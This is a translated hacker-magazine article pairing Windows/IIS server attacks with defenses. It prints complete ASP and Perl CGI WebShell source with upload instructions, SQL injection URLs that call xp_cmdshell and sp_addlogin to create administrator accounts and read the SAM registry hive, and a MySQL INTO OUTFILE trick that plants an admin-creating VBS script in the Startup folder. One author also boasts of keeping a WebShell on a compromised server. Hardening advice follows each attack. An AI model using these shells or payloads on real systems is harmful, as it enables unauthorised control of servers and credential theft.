MSSQL injection attack server and protection

xiaoxiao2021-03-06  42

This article was published in issue 5 of Hacker Line, and it was written by a few of us 哟

The sad thing is that it did not carry my name. The only thing I want to say is: Fuck Black Defense!

WinNT System Permission Settings against Hackers

Foreword: On the many servers on the network, once a hacker successfully breaks into a server, whatever its configuration, he obtains some level of permission, typically Guest or System. These intrusions succeed because of improper configuration or a lack of management experience. As long as we set suitable permissions on the various dangerous components and commands, we get the greatest possible security. Below we introduce permission settings and hacker techniques under NT systems. Of course, the NT server must not use a FAT32 partition: your NT server must use NTFS, because only NTFS lets you set permissions on the server's important files; with FAT32 there is no security at all. The intrusion-prevention examples that follow will show how important setting permissions is.

With the rapid development of the network, most people now have broadband, and the virtual hosting business is naturally getting better and better. More people build websites every year, but hackers now like to drop a WebShell into the web space of a virtual host provider to gain management of the server, which is the biggest headache for the server administrator. Through the various WebShells, hackers can run cmd commands on the server, copy and delete files, edit files online and create superusers. WebShells (also called web page Trojans) come in many kinds: ASP, CGI, PHP and JSP WebShells, the now popular xp_cmdshell and so on are all WebShells. Here we first introduce the attack and prevention methods for the various WebShells that hackers call web page Trojans. At the same time, this simplest of security settings can also prevent most overflow attacks on the network, such as the famous IDQ, IDA, WebDAV and RPC overflows, which can give a hacker management of your server; with this small security configuration you no longer need to fear the hacker's overflow attack. Even without applying patches it is safe. Believe it or not? Please read on!

The attack and prevention methods are actually very simple, so anyone familiar with web development and cmd commands can learn them; in my opinion there is nothing technically deep here, and the difficulty level (beginner) means everyone can learn it. Whether you have many years of server management experience or are a novice web server administrator, this tutorial can serve as a method of preventing WebShell and overflow attacks.

I. Basic ASP WebShell Attack and Prevention

Here we explain three ASP WebShell attacks and their prevention methods (and provide the WebShell source code):

Example 1: using a script to bind the cmd command:

This is an attack method that uses a script to bind the cmd command. In fact, this is not the only kind of ASP WebShell; two more WebShell attack and prevention methods follow below. As long as a hacker puts this WebShell on your server and you have no appropriate prevention in place, your server will fall into his hands and become the hacker's broiler (zombie). The servers that generally fall victim are those of virtual host providers, but also servers belonging to individuals or companies. How does the hacker get this WebShell onto your server? If it is uploaded to the web space of a virtual host provider, it is generally done by the provider's own customer ^_^, because the customer already has permission to upload with FTP software and knows the HTTP browsing address. The customer uses this WebShell to look at what files are stored in the server space he rents, or to steal the server through it. For the server of an individual or company, how is the WebShell placed in the server space? Generally through a script vulnerability on the server: the hacker downloads the system's script vulnerability, uses it to upload files over WWW port 80, or uses the TFTP service through some vulnerability to transfer the WebShell to your server. Since we only explain how these WebShells attack, we will not discuss how to get the WebShell into the server space; this article assumes you have already uploaded the WebShell and obtained its HTTP browsing address. As long as the server supports it, you can use this WebShell to obtain management of the server system.

This back door is very well hidden; even if you reinstall N times and apply N patches it is useless, because there is no patch for this vulnerability ^_^. As long as this WebShell still exists and the hacker finds its WWW browsing address, your server will become the hacker's broiler, so it is extremely harmful. As shown in the figure below, I uploaded a WebShell file named cmd.asp to a server with IP 192.168.0.18, placing it in the webshell folder under the FTP root directory, so it can be accessed at http://192.168.0.18/webshell/cmd.asp. We can enter any cmd command in the blank form, such as Dir C:\ and so on. If you want to create a superuser on this server, enter two commands: first NET user Netpk Hacker /ADD and click the "execute cmd command" button to create the normal user Netpk, then NET localgroup administrators Netpk /ADD to add the ordinary user Netpk to the superuser group Administrators. From this we can determine that this WebShell has full cmd command permissions. What else you might want to do, I won't teach you, huh ^_^.

Below is the source code of this cmd.asp script:

Execute command:

    <%
    Dim oScript
    Dim oScriptNet
    Dim oFileSys, oFile
    Dim szCMD, szTempFile
    szCMD = Request.Form(".cmd")
    ' Get the command from the input box
    On Error Resume Next
    ' If an error occurs, skip it and prevent an error window from popping up
    Set oScript = Server.CreateObject("WScript.Shell") ' Create a shell (WshShell) object
    Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
    szTempFile = "c:\" & oFileSys.GetTempName()
    ' GetTempName() is the FSO method for generating a temporary file name
    Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    ' Call the Run method of WshShell to execute the command and redirect its output into the temporary file
    Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
    ' Open the temporary file for reading
    %>
    " Method="POST">
    <%
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    ' Output the file content after HTML-encoding it
    oFile.Close
    ' Close the file
    Call oFileSys.DeleteFile(szTempFile, True)
    ' Delete the temporary file so it cannot be found
    %>

You only need to write the above code in Notepad, save it with the .asp extension, and upload it to your virtual host space to run it. There are several ways to prevent this script attack that binds the cmd command. In fact, to prevent it you only need to remove the FSO (Scripting.FileSystemObject) from ASP. To remove FSO, enter the following command at the cmd prompt:

    Regsvr32 /u c:\winnt\system32\scrrun.dll

Note: in practice, change the path to your local system installation directory. But this method removes too much: if we want to use FSO ourselves, we can no longer do so. So it is not recommended to remove the FSO privilege this way.

Obviously, if this is done, nobody, including the site's system administrator, can use the FileSystemObject object, which is not what the site manager wants: after all, we can use this object for convenient online site management, so if the administrator cannot use it, it is of no value, yet this dangerous object brings security vulnerabilities to the site. Is there no better way? There is! The specific method is as follows: we can stop others from illegally using the FileSystemObject object while we ourselves can still use it.

The method is as follows:

Find the registry key

    HKEY_CLASSES_ROOT\Scripting.FileSystemObject

and rename it to any string you like (right-click → Rename), for example

    HKEY_CLASSES_ROOT\Scripting.FileSystemObjectNetpk

From then on, the object must be referenced in ASP as:

    Set fso = CreateObject("Scripting.FileSystemObjectNetpk")

and the usual

    Set fso = CreateObject("Scripting.FileSystemObject")

no longer works: anyone who calls the FileSystemObject object in the usual way can no longer use it.

As long as you do not tell others the changed object name, nobody else can use the FileSystemObject object. In this way, as site managers, we stop illegal use of the FileSystemObject object while still using it ourselves for convenient online website management!

But this still leaves some risk, because this configuration is not perfect: it only solves the FSO-based cmd call and some simple ASP Trojan scripts. WebShells are not limited to ASP; there are CGI, PHP and JSP WebShells too, and if your server is configured to support CGI, PHP, JSP and so on, those WebShells do not need FSO support at all. So keep reading; there are more WebShells worth noting.

In fact, there is a simple and practical method to prevent WebShells that use an ASP script to bind the cmd command. The configuration takes only 30 seconds, and it also prevents the CGI, PHP and JSP WebShells, because one method prevents all of these script attacks as well as overflows. It is given in the last example of this article.

Example 2: WebShell attack and prevention using FSO permissions for file management

Next we introduce the Haiyang Top ASP Trojan. Through a web page, this WebShell can modify, edit, delete, move, upload and download any file on the server. Once a hacker uploads this ASP Trojan, all files on your server are under his control. What can the hacker do on your server? As mentioned above: change, delete, move ...

As shown below:

Seeing this picture, you can imagine what will become of your server: it will have no privacy, and whoever wants to hack your server or delete files on it can do so with a few mouse clicks. This ASP Trojan is available for download on every hacker website, so it is inconvenient to print its source code here.

Prevention method: the same as in Example 1; not repeated here.

Follow-up question: does this mean ASP WebShells can be stopped simply by closing FSO or renaming FSO in the registry? Not so, because there is another kind of ASP Trojan that does not require FSO support. Although it is not very powerful, its functions are more than enough to deface a website, so this kind of Trojan must also be defended against. Please see Example 3 below.

Example 3: ASP Trojan that needs no FSO

This FSO-free ASP Trojan, lacking FSO support, is of course not very powerful: it can only list directories on the server, copy and move files, execute program files at a specified path, and so on. It is worth noting that most virtual host providers still have this vulnerability; it seems their network testers do not maintain things well. Below is the picture shown when browsing this ASP Trojan. Even the server of Hacker Base has the same vulnerability. From my tests I could easily obtain management rights on Hacker Base, but people would say I was hacking Hacker Base, so I did not. (Editor comrade, you can delete what I wrote about Hacker Base, because their server is not secure and ordinary people have been getting in. I am just not in the mood to inform those braggarts: they cannot even maintain their own server, yet they talk about other people's server security. As for whether Hacker Base still has this hole now, I am not in the mood to test it for them.)

Through this FSO-free Trojan you can copy and move any file on the server and execute programs. Simple as it is, it is enough to deface a website: for example, move the website's home page elsewhere and copy a hacker page of the same name into its place, or use the execute function to run any Trojan program on the server to obtain admin rights.

Here is the source code of this FSO-free ASP Trojan:

    <% Response.Write " can only be executed at a time:) " %>
    <% Response.Write Now() %>
    The physical path where the program is located:
    <% Response.Write Request.ServerVariables("APPL_PHYSICAL_PATH") %>
    asp's shell.Application backdoor</title>
    <body>
    <form action="<%=Request.ServerVariables("URL")%>" method="POST">
    <input type=text name=text value="<%=szcmd%>"> Enter the directory you want to browse <br>
    <input type=text name=text1 value="<%=szcmd1%>">
    Copy
    <input type=text name=text2 value="<%=szcmd2%>"> <br>
    <input type=text name=text3 value="<%=szcmd3%>"> MOVE
    <input type=text name=text4 value="<%=szcmd4%>"> <br>
    Path: <input type=text name=text5 value="<%=szcmd5%>">
    Program: <input type=text name=text6 value="<%=szcmd6%>"> <br>
    <input type=submit name=sb value="Send Command">
    </form>
    </body>
    </html>
    <%
    szcmd = Request.Form("text") ' directory browsing
    If szcmd <> "" Then
    Set shell = Server.CreateObject("Shell.Application") ' create a shell object
    Set fod1 = shell.NameSpace(szcmd)
    Set foditems = fod1.Items
    For Each co In foditems
    Response.Write "<font color=red>" & co.Path & "-----" & co.Size & "</font><br>"
    Next
    End If
    %>
    <%
    szcmd1 = Request.Form("text1") ' directory copy; cannot copy files
    szcmd2 = Request.Form("text2")
    If szcmd1 <> "" And szcmd2 <> "" Then
    Set shell1 = Server.CreateObject("Shell.Application") ' create a shell object
    Set fod1 = shell1.NameSpace(szcmd2)
    For i = Len(szcmd1) To 1 Step -1
    If Mid(szcmd1, i, 1) = "\" Then
    path = Left(szcmd1, i - 1)
    Exit For
    End If
    Next
    If Len(path) = 2 Then path = path & "\"
    path2 = Right(szcmd1, Len(szcmd1) - i)
    Set fod2 = shell1.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.CopyHere foditem
    Response.Write "Command Complated Success!"
    End If
    %>
    <%
    szcmd3 = Request.Form("text3") ' directory move
    szcmd4 = Request.Form("text4")
    If szcmd3 <> "" And szcmd4 <> "" Then
    Set shell2 = Server.CreateObject("Shell.Application") ' create a shell object
    Set fod1 = shell2.NameSpace(szcmd4)
    For i = Len(szcmd3) To 1 Step -1
    If Mid(szcmd3, i, 1) = "\" Then
    path = Left(szcmd3, i - 1)
    Exit For
    End If
    Next
    If Len(path) = 2 Then path = path & "\"
    path2 = Right(szcmd3, Len(szcmd3) - i)
    Set fod2 = shell2.NameSpace(path)
    Set foditem = fod2.ParseName(path2)
    fod1.MoveHere foditem
    Response.Write "Command Complated Success!"
    End If
    %>
    <%
    szcmd5 = Request.Form("text5") ' execute the program at the specified path
    szcmd6 = Request.Form("text6")
    If szcmd5 <> "" And szcmd6 <> "" Then
    Set shell3 = Server.CreateObject("Shell.Application") ' create a shell object
    shell3.NameSpace(szcmd5).Items.Item(szcmd6).InvokeVerb
    Response.Write "Command Complated Success!"
    End If
    %>

You only need to write the above code in Notepad, save it with the .asp extension, and upload it to your virtual host space to run it.

The prevention method for this FSO-free ASP Trojan is as follows:

From the above code we can see that its shell is created through Shell.Application. We only need to find the Shell.Application and WScript.Shell keys in the registry and delete them to prevent this type of ASP Trojan attack. Deleting these keys will not affect your server or its ASP support, so please delete them.

II. Building a Virtual Host Free From the FSO Threat

Most virtual hosts now disable FileSystemObject, because this component gives ASP powerful file system access: reading, writing, copying, deleting, renaming and so on (this of course refers to Windows NT/2000 with the default settings).
But once this component is disabled, every ASP program that uses it can no longer run, which cannot meet customers' needs.

How can we allow the FileSystemObject component without harming server security (that is, without different virtual host users being able to use the component to read and write each other's files)? Here is a method I worked out in experiments, described below using Windows 2000 Server as an example.

Open Explorer on the server, right-click the drive letter of each hard disk partition (volume), choose "Properties" from the pop-up menu and select the "Security" tab. You can see which accounts can access this partition and with what rights. After a default installation, "Everyone" has Full Control. Add "Administrators", "Backup Operators", "Power Users", "Users" and so on, and give them Full Control or the corresponding permissions; note: do not give the "Guests" group or the "IUSR_machinename" account any permissions. Then delete "Everyone" from the list, so that only authorized groups and users can access this partition. Since ASP accesses the hard disk as "IUSR_machinename" when it runs, and that account has been given no permissions here, ASP can no longer read and write files on the hard disk. Next, set up a separate user account for each virtual host user, and assign each account a directory over which it has Full Control.

As shown in the figure below, open "Computer Management" → "Local Users and Groups" → "Users", right-click in the right pane and choose "New User" from the pop-up menu:

In the "New User" dialog, enter "User name", "Full name", "Description", "Password" and "Confirm password" as required, clear the "User must change password at next logon" check box, and check "User cannot change password" and "Password never expires".
In this example we create the account "IUSR_VHOST1", the built-in account for anonymous access to Internet Information Services for the first virtual host's user; that is, every client that visits this virtual host via http://xxx.xxx.xxx.xxx/ accesses it under this identity. Click "Create" when done. You can create multiple users according to actual needs; after creation, click "Close":

The newly created user now appears in the account list; double-click the account in the list to configure it further:

In the Properties dialog of "IUSR_VHOST1" (the newly created account), switch to the "Member Of" tab:

By default the new account belongs to the "Users" group; select that group and click "Remove":

Now, as shown in the figure below, click "Add":

In the "Select Groups" dialog, find "Guests" and click "Add"; the group appears in the text box below; then click "OK":

It now looks like the figure below; click "OK" to close the dialog:

Open Internet Information Services and start configuring the virtual host; this example uses the "first virtual host". Right-click the host name and choose "Properties" from the pop-up menu:

The "first virtual host Properties" dialog appears, and you can see that the virtual host uses the folder "F:\vhost1":

Leave the "first virtual host Properties" dialog aside for the moment, switch to the "F:\vhost1" folder, right-click it and choose "Properties" → "Security". You can see that the folder's default security setting is "Everyone" Full Control (what is shown depends on the situation). First clear the "Allow inheritable permissions from parent to propagate to this object" check box to remove the inherited rights:

At this point the "Security" warning shown below pops up; click "Remove":

All groups and users on the "Security" tab are now empty (if not, use "Remove" to clear them); then click the "Add" button. Add "Administrators" as shown in the figure, and add the new account "IUSR_VHOST1" created earlier, giving it Full Control. You may also add other groups or users according to actual needs, but never add the "Guests" group or the "IUSR_machinename" anonymous access account!

Switch back to the previously opened "first virtual host Properties" dialog, open the "Directory Security" tab and click "Edit":

In the "Authentication Methods" dialog (shown below), click "Edit":

The "Anonymous User Account" dialog pops up; the default is "IUSR_machinename"; click "Browse":

In the "Select User" dialog, find the new account "IUSR_VHOST1" and double-click it:

The anonymous user name is now changed; in the password box, enter the password set for the account when it was created:

Confirm the password again:

OK, done; click "OK" to close these dialogs.

After this setup, the "first virtual host" user can use ASP's FileSystemObject component to access only its own directory, F:\vhost1; when it tries to access anything else, errors such as "Permission denied", "Disk not ready" or "500 Internal Server Error" appear.

Also: if the user needs to read the hard disk partition's capacity or serial number, this setup will not allow it. To read these and other partition-level details, right-click the hard disk partition (volume), choose "Properties" → "Security", add this user's account to the list and give it at least "Read" permission. Since the subdirectories under this volume have been set not to inherit permissions from the parent, the permission settings of those subdirectories are not affected.

III. CGI, PHP and JSP WebShells and Overflow Attacks and Prevention

CGI, PHP and JSP scripts can also bind the cmd command. Are the permissions of a basic CGI WebShell any different? The answer is that their WebShell permissions are the same, and so is the way the script is used, but the prevention method is completely different: these scripts do not need FSO support, so even if you disable the FSO object and remove the Shell.Application and WScript.Shell keys used by ASP WebShells from the registry, you cannot stop these script WebShells.

Since the technique of binding cmd through a script is small whether in ASP, CGI, PHP or JSP, this whole class of attack can be fully prevented in one go. Here I give a security configuration that can be completed within 30 seconds, so that no script can remotely call your cmd command, which completely prevents WebShells that bind cmd. This is the last example in this article.

Example: CGI WebShell attack and prevention

As shown in the figure below, as long as a hacker uploads a cmd.cgi WebShell to your server, he can call cmd on your server and run any cmd command there, such as creating a super user. The figure shows this cmd.cgi WebShell running the DIR C:\ command. If a hacker has put this thing on your server, huh, you will want to cry without tears.

Even if you reinstall the server system N times and apply N more patches, it is useless: as long as you do not delete this WebShell and the hacker knows its WWW browsing address, he can always use your machine as a broiler. I once left this thing in the virtual host directory of a broiler I had broken into, and it would not die.
As long as the other party does not delete this WebShell, his server is always my broiler, because anti-virus software cannot find this thing. The code of this cmd.cgi is given below (many hacker sites on the network provide it for download):

    use CGI qw(:standard);
    print header(-charset => 'GB2312');
    $cmd = param("cmd");
    $out = `$cmd 2>&1`;
    print start_form, textfield("cmd", $cmd, 60);
    print end_form;
    print pre($out);

The above is the WebShell code; PHP and JSP WebShells are similar and will not be introduced here, because their attack and prevention methods are alike. From these examples we see that all of these WebShells call cmd.exe under the NT system to execute commands, so as long as we set suitable permissions on the cmd.exe file under NT, huh, the hacker's WebShell becomes useless. For safety we should also set permissions on dangerous commands such as net.exe, cacls.exe, telnet.exe, tftp.exe, format.com, mountvol.exe and mshta.exe, because by default these dangerous files can be accessed and executed by users in the Guests group; only by setting permissions on these files can true security be ensured. By default these files are stored in C:\Winnt\System32. To set permissions, as shown below, remove all other users' access to these commands, then allow only the account you use yourself: for example, if the super user you use is administrator, allow only the user named Administrator to use these commands in the permission settings.

Through these simple settings you can render useless any WebShell that binds the cmd command on your server. Simple enough. :)

It also prevents your server from being logged into after a hacker's overflow binds the cmd command. The reason is simple. Take the current WebDAV overflow: in these overflow attacks the hacker binds your cmd command on your server after overflowing it, then logs in via Telnet and obtains system management rights. But after the overflow the hacker can only use System permission to bind your server's cmd command, and you have set cmd to deny SYSTEM access, allowing only the single account you chose. So even if the hacker overflows successfully, he cannot bind your cmd command; and if the hacker cannot log into your server, your server is safe.

But this only gives relative safety, because with some overflow attacks the hacker can upload a reverse-connecting Trojan to your server and run it. Take the recent Serv-U overflow: if your FTP server uses Serv-U, you have not applied the latest security patch, and a hacker overflows it, the hacker may not be able to bind your cmd command and log into your server, but he can upload a reverse-connecting Trojan back door instead. This back door connects from your server to the hacker's machine, where the hacker is listening. As long as this back door is on your server, then even though you have installed a firewall so that the hacker cannot connect in to the Trojan on your server, the reverse-connecting Trojan connects out from your server to the hacker's machine, and as long as that connection request goes out, the hacker gets control of your server. This reverse Trojan attack does not depend on cmd under the NT system at all, so it can still do harm. So how do we prevent this reverse Trojan attack?
The method is simple: install a firewall that prevents reverse-connecting Trojans, such as the Tianwang or BlackICE firewalls. Both prevent reverse connections, because they have a function for setting which applications may access the network: whenever any program on the server tries to access the network, a warning window pops up, and the application is allowed network access only if you agree; this is exactly what is needed to stop reverse Trojans. For example, say your server has the Tianwang firewall installed, a hacker successfully overflows your Serv-U server and uploads a reverse-connecting back door Trojan, stored on your server as C:\mm.exe, and the hacker's IP address is 192.168.0.18. Now the hacker wants to connect back from your server: as soon as he runs this reverse Trojan on your server, your Tianwang firewall pops up a warning window, as shown below:

From this warning window we can see the hacker's real IP address, the protocol used by this reverse Trojan, and the Trojan's location on your server. As long as you click the Deny button, this program will not connect to the hacker's machine. I believe you will not be so stupid as to click Allow and let this back door connect to the hacker's machine; as long as you do not click Allow, the back door cannot connect to the hacker's machine. :)

Through this example we can see that as long as we set permissions on a few dangerous commands such as cmd and install a firewall that prevents reverse-connecting Trojans, those so-called overflow attacks cannot harm your server.

IV. MSSQL Injection Protection (this part was written by site member alpha)

MSSQL injection is a fairly direct and harmful attack method, and so-called hackers can use it directly to obtain system privileges.
Today we will look at how to prevent this attack through system settings.

The first thing to say is that these settings alone cannot guarantee your server's security. Security is a whole, but the whole is built from parts like these.

Countermeasure 1:

Pseudo-hacker: suppose this page can be injected:

http://localhost/bbs/news.asp?id=5

We usually attack it like this:

http://localhost/bbs/news.asp?id=5;exec master.dbo.xp_cmdshell 'net user alpha /add'--
http://localhost/bbs/news.asp?id=5;exec master.dbo.xp_cmdshell 'net localgroup administrators alpha /add'--

And alpha is now a system administrator!

Administrator: how do we prevent this?

Look at how they did it: by calling xp_cmdshell, an extended stored procedure in SQL Server (shown below).

We only need to right-click this extended stored procedure and delete it, and the attack above no longer works. Of course, you can also run

sp_dropextendedproc 'xp_cmdshell'

to delete xp_cmdshell.

Countermeasure 2:

Hacker's counter: if xp_cmdshell has been deleted from the MSSQL database, don't worry, we have a way!

http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll';--

With that one request we have xp_cmdshell back.

Administrator: damn, it seems our setting was not thorough enough. OK, search the C drive directly for xplog70.dll:

[figure]

Found it, deleted it, OK, now the world is quiet; at least they can no longer run system commands directly!

Countermeasure 3:

Pseudo-hacker: you think that's it? Wrong, heh, I still have plenty. As long as you connect with the sa account, I still have a way:

http://localhost/bbs/news.asp?id=5;exec xp_regread 'HKEY_LOCAL_MACHINE','SECURITY\SAM\Domains\Account','F'

Look, maybe we can get the administrator's password! Adding a startup item is naturally no problem either.

Administrator: it seems I have to keep going. Watch me delete these extended stored procedures too:

xp_regaddmultistring (add items to the registry)
xp_regdeletekey (delete a key from the registry)
xp_regdeletevalue (delete a value from the registry)
xp_regenumvalues (list the values under a key)
xp_regread (read a value under a key)
xp_regremovemultistring (remove items from the registry)
xp_regwrite (write to the registry)

Look how arrogant you were, heh; want to get in through the registry? No way!

Countermeasure 4:

Pseudo-hacker: no registry? I can still do other things! Can I add a SQL administrator? Of course!

http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_addlogin alpha;
http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_password null,alpha,alpha;
http://localhost/bbs/news.asp?id=5;exec master.dbo.sp_addsrvrolemember alpha,sysadmin;--

See? Never mind xp_cmdshell, I am now an administrator!

Administrator: forget it, I won't keep fighting you. Why must the database connection use sa at all?

I create a lower-privileged account instead. For example, I build a database called BBS, then create a login called BBS, select it as a user of the BBS database in its settings, and give it only some basic permissions. OK, if you use this user to connect to the BBS database, it is much more secure than sa!

There are many other measures, such as:

Delete unnecessary system stored procedures:

sp_bindsession sp_cursor sp_cursorclose sp_cursorfetch sp_cursoropen sp_cursoroption sp_getbindtoken sp_GetMBCSCharLen sp_IsMBCSLeadByte sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop sp_replcmds sp_replcounters sp_repldone sp_replflush sp_replstatus sp_repltrans sp_sdidebug xp_availablemedia xp_cmdshell xp_deletemail xp_dirtree xp_dropwebtask xp_dsninfo xp_enumdsn xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks xp_eventlog xp_findnextmsg xp_fixeddrives xp_getfiledetails xp_getnetname xp_grantlogin xp_logevent xp_loginconfig xp_logininfo xp_makewebtask xp_msver xp_perfend xp_perfmonitor xp_perfsample xp_perfstart xp_readerrorlog xp_readmail xp_revokelogin xp_runwebtask xp_schedulersignal xp_sendmail xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap xp_sprintf xp_sqlinventory xp_sqlregister xp_sqltrace xp_sscanf xp_startmail xp_stopmail xp_subdirs xp_unc_to_drive

Regularly check the logins:

use master
select name, password, accdate
from syslogins
order by name

That is all for today. In fact there is a lot more to defending against MSSQL injection, such as exporting special files, cracking the website password, and so on; today I only introduced these few points briefly.

I even want to say that even with all of this set up, your system is still dangerous, or rather fragile! For a safer configuration, keep watching Server Focus!

V. Simple MySQL database intrusion prevention (this part is written by Server Focus member Lonely; it is a bit rough)

On the network, many systems (Win2K, Linux) run a MySQL database. This database is indeed very popular, but such a popular database has a weakness: the database root account's password is empty, and right now many machines have this problem. I scanned one Class C address range and found more than 89 machines whose database root password was empty. Because MySQL, unlike the MSSQL database, has no xp_cmdshell-style command to call, many people who find this hole do not know how to use it. Let me introduce how a Win2K machine whose MySQL root password is empty gets used:

If MySQL is installed on your machine, use the following command:

#mysql -u root -h 192.168.0.1

After connecting successfully, look at what databases the server has:

mysql> show databases;

There are two databases, mysql and test.

mysql> use test;

After entering test, see what tables there are:

mysql> show tables;

Then I create a new table in it:

mysql> create table lonely (abc text);

Here I created a table named lonely with one field, abc, of type text.

We write commands that add a user admin with password 123.
as follows:

mysql> insert into lonely values ("Set wshell=CreateObject(""WScript.Shell"")");
mysql> insert into lonely values ("a=wshell.Run(""cmd.exe /c net user admin 123 /add"",0)");
mysql> insert into lonely values ("b=wshell.Run(""cmd.exe /c net localgroup administrators admin /add"",0)");

Check whether anything is wrong:

mysql> select * from lonely;

Then export the table as a VBS script file:

mysql> select * from lonely into outfile "C://Docume~1//AllUse~1//[Start] Menu//Program//ceshi.vbs"

We have exported the table's content into the Startup group as a VBS script file. Note the "/" symbols. Now all the work is done: when the machine restarts, ceshi.vbs starts too, and the machine then has a superuser named admin with password 123.

Defense method:

The simplest and safest defense against this attack is to set a password for the MySQL root user, as follows:

Set the password locally:

mysqladmin -u root password <password>

Set the password remotely:

grant select, update, delete on *.* to root@"<host>" identified by "<password>"

for example:

mysql> grant select, update, delete on *.* to root@"<host>" identified by "123";
Query OK, 0 rows affected (0.34 sec)

Editor: I hope this article is of some help. The writing still has many shortcomings; for various reasons there was not enough time to describe the whole security configuration process in more detail. If you want to learn more about server attack and defense, please visit the Server Focus website http://www.serverfocus.net or http://www.cnhack.cn. If you have any questions or suggestions, e-mail Netpk@cnhack.cn.

Please credit the original address when reposting: https://www.9cbs.com/read-54823.html
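The defense in section V stops at giving root a password. As an added example by the editor (not code from the article or from Lonely), the following MySQL statements go a little further: they find every passwordless account, remove the anonymous and remote-root entries a fresh install creates, and give the web application its own account without the FILE privilege, which is what the SELECT ... INTO OUTFILE step above depends on. The syntax is the MySQL 4.x/5.x form the article uses; the account 'webapp' and the database 'test' are assumed names for illustration.

```sql
-- Added example (not from the article): MySQL hardening for the empty-root-password
-- problem of section V. MySQL 4.x/5.x syntax; on MySQL 8.0 use
-- "ALTER USER ... IDENTIFIED BY" and the column authentication_string instead.

-- 1. Find every account that can log in without a password
--    (the column is 'password' up to 5.6 and 'authentication_string' from 5.7 on).
SELECT user, host FROM mysql.user WHERE password = '';

-- 2. Give root a real password, then drop the anonymous accounts and any root
--    entry reachable from a host other than localhost.
SET PASSWORD FOR 'root'@'localhost' = PASSWORD('REPLACE_WITH_STRONG_PASSWORD');
DELETE FROM mysql.user WHERE user = '';
DELETE FROM mysql.user WHERE user = 'root' AND host <> 'localhost';

-- 3. The scripted attack wrote a file with SELECT ... INTO OUTFILE, which requires
--    the FILE privilege. The application account gets table privileges only, never
--    FILE or ALL. 'webapp' and 'test' are assumed names.
GRANT SELECT, INSERT, UPDATE, DELETE ON test.* TO 'webapp'@'localhost'
    IDENTIFIED BY 'REPLACE_WITH_STRONG_PASSWORD';

-- 4. Apply and verify: no account other than root@localhost should hold FILE,
--    the empty-password query from step 1 should now return no rows, and the
--    application account's grants should list only the table privileges above.
FLUSH PRIVILEGES;
SELECT user, host FROM mysql.user WHERE File_priv = 'Y';
SELECT user, host FROM mysql.user WHERE password = '';
SHOW GRANTS FOR 'webapp'@'localhost';
```

Two server-side settings complete the picture: bind-address (or skip-networking) in my.cnf so the server does not accept connections from the whole network the way the scan in section V relied on, and secure_file_priv so that even a login holding FILE can only write into one designated directory rather than the Startup folder.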